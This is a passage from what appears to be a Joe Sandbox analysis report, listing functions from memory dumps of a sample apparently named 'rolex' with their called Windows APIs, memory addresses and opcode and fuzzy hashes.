                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1624603282-0
                                                                                • Opcode ID: 84549558681af96b4525e1e1ffe2288fe9035f316ab4ad669e4cf30d3a3af5a1
                                                                                • Instruction ID: 0bab7cfb7212697f4bcfc1386ced82f284cee259d4a85492d6a3207960681aa7
                                                                                • Opcode Fuzzy Hash: 84549558681af96b4525e1e1ffe2288fe9035f316ab4ad669e4cf30d3a3af5a1
                                                                                • Instruction Fuzzy Hash: 4A61AF62B26B8592EE08EFA9D5540BCB365FF45F90B954136D72D07AF1CF28E4A18310
                                                                                Function 00007FF7AB49EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 69a943e656ee331f1661201cfe822fb8f69a168c4299475660200162fa714270
                                                                                • Instruction ID: 938770db6c0d88f4d2eefd0505cbaae4aeff63328881922134f753ce45626c05
                                                                                • Opcode Fuzzy Hash: 69a943e656ee331f1661201cfe822fb8f69a168c4299475660200162fa714270
                                                                                • Instruction Fuzzy Hash: 6551C362A4964250FE20BB29D4447B9A751FB86BC4F850136EF4D077B6DE3DE489C320
                                                                                Function 00007FF7AB49E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49E993
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1011579015-0
                                                                                • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                • Instruction ID: 47430ec3da844fe25e11ffbf84de4f24944697165017c2620b7e002ea08cd04d
                                                                                • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                • Instruction Fuzzy Hash: 6F514F22A0A68681FE60EF7DD48576DA361FF85B84F850136EA8D077B5DF2CE446C720
                                                                                Function 00007FF7AB4A1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 61fec30c4ba775886d5a885ca6c3d9e3f01b60c7a9016415a9e671651ca41277
                                                                                • Instruction ID: 29110cb5556f536dd773def5129e9b6e2e9d29bd19749300bff3843254951f84
                                                                                • Opcode Fuzzy Hash: 61fec30c4ba775886d5a885ca6c3d9e3f01b60c7a9016415a9e671651ca41277
                                                                                • Instruction Fuzzy Hash: 35410862B19B8142EE14AA1BA640379E251FB45FC0F858539EE5C07F7ADF7CD4518300
                                                                                Function 00007FF7AB4A2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 71211bdb8fcfb718bc8c1f80de60d6f389c440e1fadeaa63cd7f355b18b082f6
                                                                                • Instruction ID: 002c6342c31a6c628440f945221087c86560333edde54bbb012947474e430aa5
                                                                                • Opcode Fuzzy Hash: 71211bdb8fcfb718bc8c1f80de60d6f389c440e1fadeaa63cd7f355b18b082f6
                                                                                • Instruction Fuzzy Hash: 14410662A0EB0181EE10AB2DE545379B3A0FB85BD8F860138EA4D077B9DF3DE4408320
                                                                                Function 00007FF7AB4CBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                • API String ID: 3947729631-0
                                                                                • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction ID: 231f174817c0112b4fc3ecc15d316dd2bfbd7d70951f3dd01396011205c4e2d6
                                                                                • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction Fuzzy Hash: 85410522E1B60A92FB54FB2E9850178A761AF56F40FC64436DA0D476B1CF3EF841C760
                                                                                Function 00007FF7AB49129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 680105476-0
                                                                                • Opcode ID: fb4569e23469dfa57eec0626174c03e5963d7f6e26c3e18aa513be619ff1198f
                                                                                • Instruction ID: 6838046bfd2d55a163c5756ad2f4338b6870b0f1051bf7a1729aea75d23603f6
                                                                                • Opcode Fuzzy Hash: fb4569e23469dfa57eec0626174c03e5963d7f6e26c3e18aa513be619ff1198f
                                                                                • Instruction Fuzzy Hash: D721A322A0A25195FA24AEB9A400679A260BB05BF0F990730EE7E07BF1DE7CE0519310
                                                                                Function 00007FF7AB4D124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction ID: 5256a6de1b5eae740a3b8bb4126b141bec2270f3c3082de5c9c1be503d78e4d3
                                                                                • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction Fuzzy Hash: 27118132A0F6428AF750AF589480579F3A5FB40784FD70535EA4D976B6DF2DE4009721
                                                                                Function 00007FF7AB4BFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: GetDlgItem.USER32 ref: 00007FF7AB4BF0E3
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: ShowWindow.USER32 ref: 00007FF7AB4BF109
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF11E
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF136
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF157
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF173
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1B6
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1D4
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1E8
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF212
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF22A
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4BFD03
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 4003826521-0
                                                                                • Opcode ID: 0ecee51bcaebc13f66a433cccdbba23f80d9542112960a9b3272f635afdf41c4
                                                                                • Instruction ID: ef0a30c58d7299a0e914950608e0c091a9997c94ec7243ab49d1142dc1ab8a61
                                                                                • Opcode Fuzzy Hash: 0ecee51bcaebc13f66a433cccdbba23f80d9542112960a9b3272f635afdf41c4
                                                                                • Instruction Fuzzy Hash: B301C862A1668542FD10B77CD44537DA321FF8AB94F910331EBAD466F6DF2CE0808714
                                                                                Function 00007FF7AB493AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                • Instruction ID: fc701ef7867717c9af939c6036f8870d78b2777de61e272a2c744096c4687d3c
                                                                                • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                • Instruction Fuzzy Hash: 73018462E1A78581EA11A72CE445269B361FFCAB94FC15231EA9C07BB6DF6CD0408714
                                                                                Function 00007FF7AB4C1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4C1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF7AB4C1573,?,?,?,00007FF7AB4C192A), ref: 00007FF7AB4C162B
                                                                                • DloadProtectSection.DELAYIMP ref: 00007FF7AB4C15C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: DloadHandleModuleProtectSection
                                                                                • String ID:
                                                                                • API String ID: 2883838935-0
                                                                                • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                • Instruction ID: 3771bafcf22b8e5f9747101f3d859b68068029aec5e2635100580a074673fe36
                                                                                • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                • Instruction Fuzzy Hash: F111CC61E0B51782FB60BB2DA850371A790AF15B48FD61035C90D4B2B1FE3CBC999630
                                                                                Function 00007FF7AB4CFA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction ID: 43592e67c9c1abda54fc772ce6628fb9d4fd6d8541416a6cdb6f365603944b29
                                                                                • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction Fuzzy Hash: 05F06D51B0B70785FE587BAE99113B4D2905F46F88FCA5430C90E8A7F2EE2DE6894330
                                                                                Function 00007FF7AB4A3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A40BC: FindFirstFileW.KERNELBASE ref: 00007FF7AB4A410B
                                                                                  • Part of subcall function 00007FF7AB4A40BC: FindFirstFileW.KERNEL32 ref: 00007FF7AB4A415E
                                                                                  • Part of subcall function 00007FF7AB4A40BC: GetLastError.KERNEL32 ref: 00007FF7AB4A41AF
                                                                                • FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1464966427-0
                                                                                • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction ID: 08d18e54e6f6057a2aeb6cb4e059b26a6585a7b11934a6ecf579e0f829120819
                                                                                • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction Fuzzy Hash: 78F0C86290E24185DA50BFB9A100179B760AF15BB4F96533CEA3D073F7DE28D444C765
                                                                                Function 00007FF7AB4CD94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction ID: 26f0c30056bd93c9567537175e682ca54bc816c68ad9feb0209369c7c12a8f1d
                                                                                • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction Fuzzy Hash: BBF05E15B0B60744FF547AB9580027496A05F46F60FCA1630D96E462F5DE1CE4708130
                                                                                Function 00007FF7AB4A20D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7AB4A207E), ref: 00007FF7AB4A20F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction ID: ee3e3519801842d2b065e300408af57084c33a2b4f9837143d004fa9ce24d82f
                                                                                • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction Fuzzy Hash: EEF0AF32A0A68285FB249B38E441379AB61EB14B78FCA4338E73C051F4DF28D8959320
                                                                                Function 00007FF7AB4A273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
